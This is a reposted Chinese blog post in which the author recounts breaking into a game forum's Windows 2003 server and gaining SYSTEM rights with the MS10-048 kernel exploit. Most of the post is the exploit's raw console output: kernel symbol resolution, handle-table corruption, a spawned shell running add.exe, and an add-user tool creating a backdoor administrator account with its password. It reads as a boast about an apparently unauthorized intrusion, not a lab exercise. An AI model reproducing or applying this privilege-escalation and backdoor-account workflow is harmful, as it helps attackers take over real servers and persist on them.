MS10048依旧是Windows 2003 x86 的杀器-白红宇

MS10048依旧是Windows 2003 x86 的杀器

阅读量：6603 次

发布时间：2019-06-24

本文共 5485 字，大约阅读时间需要 18 分钟。

今天搞了个wow的游戏论坛，服务器环境是win03 x86+iis6.0+php+mysql。

提权的时候各种无奈，mysql无权限，而且没root，试了几个别的方法都不行，实在没办法的时候，用MS10048试了下，成功了。

Dojibiron by Ronald Huizer, (c) master#h4cker.us  [ ] Trying to allocate a page at NULL.    [+] Allocated page at 0x0000000000000000 for 0x0000000000000001[ ] Bootstrapping kernel resolver.    Module ntoskrnl.exe at 0x0000000000BD0000    Base of driver: 0xFFFFF80001000000    [+] Success.[ ] Resolving PsReferencePrimaryToken    [+] Success: 0xFFFFF8000129FE50[ ] Resolving PsInitialSystemProcess    [+] Success: 0xFFFFF800011D1FB0[ ] Resolving PsLookupProcessByProcessId    [+] Success: 0xFFFFF80001288BC0[ ] Resolving PsDereferencePrimaryToken    [+] Success: 0xFFFFF80001311B40[+] Handle table retrieval succeeded.    Userspace handle table: 0x00000000006B0000    Kernelspace handle table: 0xFFFFF97FF7990000    Handle table entries: 1024[ ] Allocating fake HEAD page.    [+] Allocated page at 0x0000000004000000 for 0x00000000040001FF[ ] Setting up CBT filter hook.    [+] Success.[ ] Creating evil window    [+] Success.[ ] Destroyed handle at: 0xFFFFF97FF7990FC0    pHead:	0xFFFFF97FF906BA00    pOwner:	0xFFFFFA80000E8D80    bType:	0x01 - TYPE_WINDOW    bFlags:	0x00 -     wUniq:	0x0004[ ] Trigger handle at: 0xFFFFF97FF7995AC0    pHead:	0xFFFFF97FF90900A0    pOwner:	0xFFFFFA80000E8D80    bType:	0x01 - TYPE_WINDOW    bFlags:	0x00 -     wUniq:	0x0003[ ] Writing pool addr to: 0xFFFFF97FF7990F7F	~ MS10_048 X64 EXP        ~	Need a girl to love   QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	aster#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	01010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	0101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	1001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	00000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	0101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	10101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	1001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110	11111111110101010101111010101110101010101010101010101010111100000000000110	110101010101010101010101010111100000000000110	111100000000000110	0000110[ ] Checking the success flag.    [+] Set to 2 exploit half succeeded[ ] Destroying trigger window    pHead:	0x00000000000003CA    pOwner:	0x0000000000000000    bType:	0x00 - TYPE_FREE    bFlags:	0x00 -     wUniq:	0x0004[ ] Spawning half a shell...    Command: D:\RECYCLER\add.exe[+] Enjoy!          ==========================================              Api Add User Made By Cond0r                    2011.3.20              Adduser.exe UserName PassWord Group          ==========================================	 User List:	-->  7ksf	-->  ASPNET	-->  Guestasdfa	-->  IUSR_NJXW-12-5-2	-->  IWAM_NJXW-12-5-2	-->  SUPPORT_388945a0	Group List:	 --> Administrators 	 --> Backup Operators 	 --> Distributed COM Users 	 --> Guests 	 --> Network Configuration Operators 	 --> Performance Log Users 	 --> Performance Monitor Users 	 --> Power Users 	 --> Print Operators 	 --> Remote Desktop Users 	 --> Replicator 	 --> Users 	 --> HelpServicesGroup 	 --> IIS_WPG 	 --> TelnetClients  SuccessFul !!User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !! 利用api加用户工具，成功添加cond0r密码为123!@#asdASD的账户

转载于:https://www.cnblogs.com/hookjoy/p/3608694.html

你可能感兴趣的文章

[转]23个最有用的Elasticsearch检索技巧

使用OpenGrok搭建可搜索可跳转的源码阅读网站

查看>>

HTML5开发中的javascript闭包

查看>>